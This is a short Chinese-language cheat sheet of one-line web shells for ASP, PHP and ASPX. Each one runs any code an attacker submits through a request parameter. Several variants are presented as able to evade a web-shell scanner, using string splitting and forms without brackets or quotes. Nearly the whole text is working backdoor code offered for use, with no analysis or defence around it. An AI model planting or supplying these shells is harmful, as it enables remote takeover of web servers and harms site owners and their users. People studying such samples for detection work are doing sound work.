asp一句话
1 | <%execute(request("1"))%> |
php一句话
1 | <?php eval($_POST[1]);?> |
aspx一句话
1 2 3 | <script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script> |
可以躲过雷客图的一句话。
1 2 3 4 5 6 7 | <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject "Response", Responsems.AddObject "request", requestms.ExecuteStatement("ev"&"al(request(""1""))")%> |
不用’< , >’的asp一句话
1 | <script language=VBScript runat=server>execute request("1")</script> |
不用双引号的一句话。
1 | <%eval request(chr(35))%> |